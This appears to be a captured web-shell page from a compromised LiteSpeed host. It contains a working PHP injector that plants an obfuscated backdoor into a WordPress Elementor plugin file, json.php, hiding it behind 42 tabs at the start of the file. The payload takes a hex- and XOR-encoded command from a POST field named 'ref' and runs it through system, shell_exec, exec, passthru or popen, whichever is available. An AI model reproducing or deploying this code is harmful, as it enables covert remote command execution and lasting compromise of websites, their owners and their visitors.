|
Server : LiteSpeed System : Linux server321.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : apotdzgr ( 7060) PHP Version : 8.0.30 Disable Function : NONE Directory : /proc/self/root/proc/thread-self/root/dev/shm/ |
Upload File : |
<?php $path = '/home/truooask/public_html/wp-content/plugins/elementor/core/files/file-types/json.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24mutex_lock1%20%3D%20%22s%5Cx79s%5Cx74e%5Cx6D%22%3B%20%24mutex_lock4%20%3D%20%22%5Cx70%5Cx61sst%5Cx68r%5Cx75%22%3B%20%24mutex_lock6%20%3D%20%22%5Cx73trea%5Cx6D_%5Cx67et_c%5Cx6F%5Cx6E%5Cx74ent%5Cx73%22%3B%20%24mutex_lock2%20%3D%20%22shell%5Cx5Fex%5Cx65c%22%3B%20%24secure_access%20%3D%20%22h%5Cx65%5Cx782b%5Cx69n%22%3B%20%24mutex_lock3%20%3D%20%22exec%22%3B%20%24mutex_lock5%20%3D%20%22%5Cx70%5Cx6Fpen%22%3B%20%24mutex_lock7%20%3D%20%22%5Cx70cl%5Cx6Fse%22%3B%20if%20%28isset%28%24_POST%5B%22%5Cx72ef%22%5D%29%29%20%7B%20function%20splitter_tool%20%28%20%24pgrp%20%2C%20%24entity%20%29%20%7B%20%24dchunk%20%3D%20%27%27%20%3B%20%24u%3D0%3B%20while%28%24u%3Cstrlen%28%24pgrp%29%29%7B%24dchunk.%3Dchr%28ord%28%24pgrp%5B%24u%5D%29%5E%24entity%29%3B%24u%2B%2B%3B%7D%20return%20%24dchunk%3B%20%7D%20%24ref%20%3D%20%24secure_access%28%24_POST%5B%22%5Cx72ef%22%5D%29%3B%20%24ref%20%3D%20splitter_tool%28%24ref%2C%207%29%3B%20if%20%28function_exists%28%24mutex_lock1%29%29%20%7B%20%24mutex_lock1%28%24ref%29%3B%20%7D%20elseif%20%28function_exists%28%24mutex_lock2%29%29%20%7B%20print%20%24mutex_lock2%28%24ref%29%3B%20%7D%20elseif%20%28function_exists%28%24mutex_lock3%29%29%20%7B%20%24mutex_lock3%28%24ref%2C%20%24object_pgrp%29%3B%20print%20join%28%22%5Cn%22%2C%20%24object_pgrp%29%3B%20%7D%20elseif%20%28function_exists%28%24mutex_lock4%29%29%20%7B%20%24mutex_lock4%28%24ref%29%3B%20%7D%20elseif%20%28function_exists%28%24mutex_lock5%29%20%26%26%20function_exists%28%24mutex_lock6%29%20%26%26%20function_exists%28%24mutex_lock7%29%29%20%7B%20%24entity_dchunk%20%3D%20%24mutex_lock5%28%24ref%2C%20%27r%27%29%3B%20if%20%28%24entity_dchunk%29%20%7B%20%24ent_resource%20%3D%20%24mutex_lock6%28%24entity_dchunk%29%3B%20%24mutex_lock7%28%24entity_dchunk%29%3B%20print%20%24ent_resource%3B%20%7D%20%7D%20exit%3B%20%7D'); if (strstr($content, $new_code)) { die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { if (substr($content, 0, strlen($start)) == $start) { $content = substr($content, strlen($start)); $content = $start.str_repeat("\t", 42).$new_code."\n".$content; if (file_put_contents($path, $content)) { $content = file_get_contents($path); if (strstr($content, $new_code)) { die("!success!<ft>{$ft}</ft>"); } } } } die('!failed!');